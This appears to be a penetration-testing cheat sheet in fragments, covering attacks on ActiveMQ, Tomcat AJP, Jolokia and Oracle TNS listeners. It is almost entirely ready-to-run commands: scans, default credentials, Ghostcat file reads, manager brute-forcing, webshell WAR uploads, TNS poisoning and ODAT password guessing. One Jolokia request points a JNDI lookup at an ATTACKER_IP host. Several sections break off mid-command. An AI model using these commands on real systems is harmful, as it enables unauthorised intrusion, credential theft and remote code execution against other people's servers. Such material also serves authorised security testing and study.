Steinz Security

  #Commonly Observed on Ports - 32064, 32357, 61616l you will find it together with RMI (1099 Port) & a webserver (6161 - jetty) Nmap Scan nmap -sV -Pn -n -T4 --script amqp-info -p 61616 10.10.10.10 Web server -- http://10.10.10.10:8161/admin -> default creds- admin:admin #Query the server curl -d 'body="Hello World"' "http://10.10.10.10:8161/demo/message/test?type=queue&clientId=consumerA" curl -u admin:admin -d "body=message" http://localhost:8161/api/message/TEST?type=queue Connecting to ActiveMQ (Might require creds) #Download activemq from here unzip filename go to conf/activemq-cli.config --> and update the IP Address broker { local { amqurl = "tcp://10.10.10.10:32064" jmxurl = "service:jmx:rmi:///jndi/rmi://10.10.10.10:1099/jmxrmi" username = "" password = "" prompt-color = "light-blue&q

  NMAP nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 10.10.10.10 Ghost Vulnerability - LFI Patached versions: after 9.0.31, 8.5.51, and 7.0.100 git clone https://github.com/doggycheng/CNVD-2020-10487.git python CNVD-2020-10487-Tomcat-Ajp-lfi.py -f /index.jsp 192.168.125.128 AJPY git clone https://github.com/hypn0s/AJPy.git python3 setup.py install #Get Version python tomcat.py version 10.10.10.10 python tomcat.py -v bf -U /opt/metasploit-framework/embedded/framework/data/wordlists/tomcat_mgr_default_users.txt -P /opt/metasploit-framework/embedded/framework/data/wordlists/tomcat_mgr_default_users.txt /manager/html 10.10.10.10 #Upload WAR File python tomcat.py upload -u tomcat -p tomcat webshell.war 172.17.0.2 #List available applications python tomcat.py list -u tomcat -p tomcat 172.17.0.2 #GHOST LFI CVE exploit python tomcat.py read_file --webapp=examples /WEB-INF/web.xml 172.17.0.2 Other attacks - Rev proxy attack nginx Module abuse - Re

  Usually found under - No Default port - can be used under any webserver /jolokia /actuator/jolokia #Get basic Version info and where it is being used curl http://10.10.10.10:8899/jolokia/ #Get the list of functions curl http://10.10.10.10/jolokia/list #Check Vuln Status to AccessLogValve Exploit curl -kL http://10.10.10.10:8080/jolokia/read/Catalina:host=localhost,name=AccessLogValve,type=Valve #Access an instance curl -d '{ "type" : "read", "mbean" : "java.lang:type=Memory", "target" : { "url" : "service:jmx:rmi:///jndi/ldap://ATTACKER_IP:8001/jmxrm" } }' 'http://VICTIM_IP:8080/jolokia/' Jolokia Tool Kit git clone https://github.com/laluka/jolokia-exploitation-toolkit python jolokia-parser.py http://10.10.10.10:8899/jolokia/ | tee jolokia-list.log #Commend EXEC - Based on the output create the command grep createStandardHost jolokia-list.log curl -skg 'http:

  #nmap nmap -Pn -sV -p1521 --script=oracle* 10.10.10.10 #Check for service Version #Oracle Database 11g 11.1.0.7, 11.2.0.2, and 11.2.0.3, and 10g 10.2.0.3, 10.2.0.4, and 10.2.0.5, #try this exploit GitHub - bongbongco/CVE-2012-1675: Oracle Database TNS Listener Poison Attack Vulnerability nmap -Pn -sT --script=+oracle-tns-poison.nse -p 1521 10.10.10.10 Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP ODAT - Oracle Database Attacking Tool #Download the release https://github.com/quentinhardy/odat/releases/ tar -xvf filename #Run ./odat all -s 10.10.10.10 ./odat all -s 10.10.10.10 -d SID_NAME ./odat all -s 10.10.10.10 -d '' #Check with creds ./odat all -s 192.168.1.254 -p 1521 -d ORCL -U SYS -P password #bruteforce when you know SID ./odat all -s 10.10.10.10 -d '' --accounts-file accounts/accounts_multiple.txt #Enum - Doesn't work if password protected sudo apt install tnscmd10g #Version tnscmd10g version -h 10.10.10.10 #Status tnscmd10g status -h 10.10.10.10